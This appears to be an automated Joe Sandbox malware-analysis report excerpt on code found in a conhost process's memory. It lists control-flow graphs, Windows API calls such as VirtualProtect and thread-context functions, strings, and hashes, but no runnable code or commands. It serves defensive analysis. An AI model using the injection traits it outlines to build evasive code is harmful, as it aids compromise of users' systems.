                                                          control_flow_graph 511 1d29e8c7940-1d29e8c7946 512 1d29e8c7981-1d29e8c798b 511->512 513 1d29e8c7948-1d29e8c794b 511->513 514 1d29e8c7aa8-1d29e8c7abd 512->514 515 1d29e8c794d-1d29e8c7950 513->515 516 1d29e8c7975-1d29e8c79b4 call 1d29e8c7ff0 513->516 520 1d29e8c7abf 514->520 521 1d29e8c7acc-1d29e8c7ae6 call 1d29e8c7e84 514->521 518 1d29e8c7968 __scrt_dllmain_crt_thread_attach 515->518 519 1d29e8c7952-1d29e8c7955 515->519 534 1d29e8c79ba-1d29e8c79cf call 1d29e8c7e84 516->534 535 1d29e8c7a82 516->535 523 1d29e8c796d-1d29e8c7974 518->523 525 1d29e8c7961-1d29e8c7966 call 1d29e8c7f34 519->525 526 1d29e8c7957-1d29e8c7960 519->526 527 1d29e8c7ac1-1d29e8c7acb 520->527 532 1d29e8c7b1f-1d29e8c7b50 call 1d29e8c81c0 521->532 533 1d29e8c7ae8-1d29e8c7b1d call 1d29e8c7fac call 1d29e8c7e4c call 1d29e8c8348 call 1d29e8c8160 call 1d29e8c8184 call 1d29e8c7fdc 521->533 525->523 543 1d29e8c7b61-1d29e8c7b67 532->543 544 1d29e8c7b52-1d29e8c7b58 532->544 533->527 546 1d29e8c7a9a-1d29e8c7aa7 call 1d29e8c81c0 534->546 547 1d29e8c79d5-1d29e8c79e6 call 1d29e8c7ef4 534->547 538 1d29e8c7a84-1d29e8c7a99 535->538 549 1d29e8c7bae-1d29e8c7bc4 call 1d29e8c3620 543->549 550 1d29e8c7b69-1d29e8c7b73 543->550 544->543 548 1d29e8c7b5a-1d29e8c7b5c 544->548 546->514 564 1d29e8c7a37-1d29e8c7a41 call 1d29e8c8160 547->564 565 1d29e8c79e8-1d29e8c7a0c call 1d29e8c830c call 1d29e8c7e3c call 1d29e8c7e68 call 1d29e8cbc3c 547->565 554 1d29e8c7c4f-1d29e8c7c5c 548->554 567 1d29e8c7bfc-1d29e8c7bfe 549->567 568 1d29e8c7bc6-1d29e8c7bc8 549->568 555 1d29e8c7b7f-1d29e8c7b8d 550->555 556 1d29e8c7b75-1d29e8c7b7d 550->556 562 1d29e8c7b93-1d29e8c7ba8 call 1d29e8c7940 555->562 577 1d29e8c7c45-1d29e8c7c4d 555->577 556->562 562->549 562->577 564->535 586 1d29e8c7a43-1d29e8c7a4f call 1d29e8c81b0 564->586 565->564 611 1d29e8c7a0e-1d29e8c7a15 __scrt_dllmain_after_initialize_c 565->611 575 1d29e8c7c00-1d29e8c7c03 567->575 576 1d29e8c7c05-1d29e8c7c1a call 1d29e8c7940 567->576 568->567 574 1d29e8c7bca-1d29e8c7bec call 1d29e8c3620 call 1d29e8c7aa8 568->574 574->567 606 1d29e8c7bee-1d29e8c7bf3 574->606 575->576 575->577 576->577 595 1d29e8c7c1c-1d29e8c7c26 576->595 577->554 597 1d29e8c7a51-1d29e8c7a5b call 1d29e8c80c8 586->597 598 1d29e8c7a75-1d29e8c7a80 586->598 601 1d29e8c7c31-1d29e8c7c41 595->601 602 1d29e8c7c28-1d29e8c7c2f 595->602 597->598 610 1d29e8c7a5d-1d29e8c7a6b 597->610 598->538 601->577 602->577 606->567 610->598 611->564 612 1d29e8c7a17-1d29e8c7a34 call 1d29e8cbbf8 611->612 612->564
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction ID: 7dbce0ee019654ad271702b6b52ccf1bbfd2d96d306b60ed36a4bc96b1b59494
                                                          • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction Fuzzy Hash: FC81BF7160366586F75CAFF594713D92390BBB7B8CF044027EA78437B6DA3AC9868700
                                                          Function 000001D29E8CA1F4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000001D29E8CA3B3,?,?,?,000001D29E8C9B9C,?,?,?,?,000001D29E8C96BD), ref: 000001D29E8CA279
                                                          • GetLastError.KERNEL32(?,?,?,000001D29E8CA3B3,?,?,?,000001D29E8C9B9C,?,?,?,?,000001D29E8C96BD), ref: 000001D29E8CA287
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000001D29E8CA3B3,?,?,?,000001D29E8C9B9C,?,?,?,?,000001D29E8C96BD), ref: 000001D29E8CA2B1
                                                          • FreeLibrary.KERNEL32(?,?,?,000001D29E8CA3B3,?,?,?,000001D29E8C9B9C,?,?,?,?,000001D29E8C96BD), ref: 000001D29E8CA2F7
                                                          • GetProcAddress.KERNEL32(?,?,?,000001D29E8CA3B3,?,?,?,000001D29E8C9B9C,?,?,?,?,000001D29E8C96BD), ref: 000001D29E8CA303
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                          • Instruction ID: 58c48f13cdf15a63397576e6a12ab1cc5009d60fdba247cbb9cebc0aced32b58
                                                          • Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                          • Instruction Fuzzy Hash: FB31B631313A70E5EF1A9BD6A8207D92394BB69BA8F590626DD3F073B1DF39C5858300
                                                          Function 000001D29E8D41E4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                          • Instruction ID: 6902942405629e849f29cfbac9ca15efd2b4a7f93a50d25bca3d0cac9ab0ac44
                                                          • Opcode Fuzzy Hash: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                          • Instruction Fuzzy Hash: 3B118271311B6486E7549B92F86435D66A4FFA8FE8F44421AEA7E877B4CF38C8848740
                                                          Function 000001D29E8C3BC0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID: wr
                                                          • API String ID: 1092925422-2678910430
                                                          • Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                          • Instruction ID: 0546fa13572bbf481bf845f95c433a7d11921431f24a255cbba33c2ee440a035
                                                          • Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                          • Instruction Fuzzy Hash: D9118E36302754C2EB589B65E4242AD6361FF59B98F08042ADEBD03765EF3DC9858704
                                                          Function 000001D29E8C5F60 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                          • Instruction ID: 82bc11c909149179d69fe6b225af1e9ddc9cf23d6c5aa8493685a2f5972d99c7
                                                          • Opcode Fuzzy Hash: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                          • Instruction Fuzzy Hash: F3D1C97620AB9886DB749B56E4A039A77A0F3D9B88F100117EAED57BB5CF3CC541DB00
                                                          Function 000001D29E8C31CC Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: dialer
                                                          • API String ID: 756756679-3528709123
                                                          • Opcode ID: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                          • Instruction ID: eaba61874ba32c9064265aa58c7ab5254510d23f78e146824236608287e0a28a
                                                          • Opcode Fuzzy Hash: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                          • Instruction Fuzzy Hash: 0A31C432703B6586EF58DFD6E4653A963A0FB65B89F044026CE7803B66DF34C4A68700
                                                          Function 000001D29E8CD3D0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,000001D29E8CDAE5,?,?,?,?,000001D29E8CDBA8), ref: 000001D29E8CD3DF
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8CDAE5,?,?,?,?,000001D29E8CDBA8), ref: 000001D29E8CD415
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8CDAE5,?,?,?,?,000001D29E8CDBA8), ref: 000001D29E8CD442
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8CDAE5,?,?,?,?,000001D29E8CDBA8), ref: 000001D29E8CD453
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8CDAE5,?,?,?,?,000001D29E8CDBA8), ref: 000001D29E8CD464
                                                          • SetLastError.KERNEL32(?,?,?,000001D29E8CDAE5,?,?,?,?,000001D29E8CDBA8), ref: 000001D29E8CD47F
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast
                                                          • String ID:
                                                          • API String ID: 2506987500-0
                                                          • Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                          • Instruction ID: a82f20192614bc5bd8b928fe253d302ce327c51622f0f639314a75d53b47b926
                                                          • Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                          • Instruction Fuzzy Hash: 1D115E302476A082FB5CB3A166753BD63927B667FCF14532BD93607AF6DA38D4418201
                                                          Function 000001D29E8C1934 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                          • Instruction ID: cdd734ac5c25bb2b168afc523aefd98578930d11bb2c10f36574dccc0fe9e3f5
                                                          • Opcode Fuzzy Hash: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                          • Instruction Fuzzy Hash: 80016171306A5582EB18DB92A4A439D63A1FF99FC4F444136DE7D43764DE3CC989C740
                                                          Function 000001D29E8C3B0C Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                          • Instruction ID: 76c3df1580c1b1b516ae38c92b088cdaca9168a6c6e6c7f826b0425569e9a639
                                                          • Opcode Fuzzy Hash: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                          • Instruction Fuzzy Hash: D801217571375CC2EB29ABA1E82979963A0BF69B49F04042ACA7D16775EF3DC4488700
                                                          Function 000001D29E8C9435 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction ID: 212a9a713a97621ced460a944e2b2f0120e0471c93ccc44a32008e31a86fb7ef
                                                          • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction Fuzzy Hash: 7C51E3323136608ADB1CCFA5E424B983395F767B9CF5089A2DA3643798EB35C881C704
                                                          Function 000001D29E898835 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: displacement map'$csm$f
                                                          • API String ID: 3242871069-3478954885
                                                          • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction ID: a7cbba46eca7e1e50a639d74c9e11893f7a944aef5d7ddb2261a91928f407243
                                                          • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction Fuzzy Hash: CD51B032A13622ABEB5CDBA5E428B983795F370BDCF508122DA7657799DB34C842C701
                                                          Function 000001D29E8C9418 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: cd5e78f7a824d61b6a4bd1de3076d2d48bd843f6231fa7e8b66aa639a396b76c
                                                          • Instruction ID: dd702e7464cf870e71e8b8ca8fe8cb42083e929ff7e8ffb04fc9267c5e82795f
                                                          • Opcode Fuzzy Hash: cd5e78f7a824d61b6a4bd1de3076d2d48bd843f6231fa7e8b66aa639a396b76c
                                                          • Instruction Fuzzy Hash: 6531E8712037A0C6E718DF91E86479D37A4F766B8CF058456EE7A437A8CB38C981C704
                                                          Function 000001D29E898818 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: displacement map'$csm$f
                                                          • API String ID: 3242871069-3478954885
                                                          • Opcode ID: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                          • Instruction ID: 33d2f17e0c434079c8c6bd42d7ba2ff298c6bfe5ab41ce093590189175e33851
                                                          • Opcode Fuzzy Hash: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                          • Instruction Fuzzy Hash: C731E232602761A6E718DF61E86879937A4F370BCCF148016EEB6577A9CB38C942C704
                                                          Function 000001D29E8C19D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                          • Instruction ID: 54e4c8e26eeb472447c7b40dd291c7334073cf7e254840db2ef71c6eb90632a3
                                                          • Opcode Fuzzy Hash: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                          • Instruction Fuzzy Hash: 6CF0AF7234569592EB248FA0F5E479D6360FF69B8CF849022CAA9425B4DE7CC688DB00
                                                          Function 000001D29E8C330C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                          • Instruction ID: 59fcb1e2b9ac56b57bb401c1ab5c5b572f164ec7d71c6ee83f698a3cc4213cc2
                                                          • Opcode Fuzzy Hash: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                          • Instruction Fuzzy Hash: 98F054702067A482EB1C4B93B92419D6250FF58FC4F084022EE7607779CF3CC4868740
                                                          Function 000001D29E8CC0C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
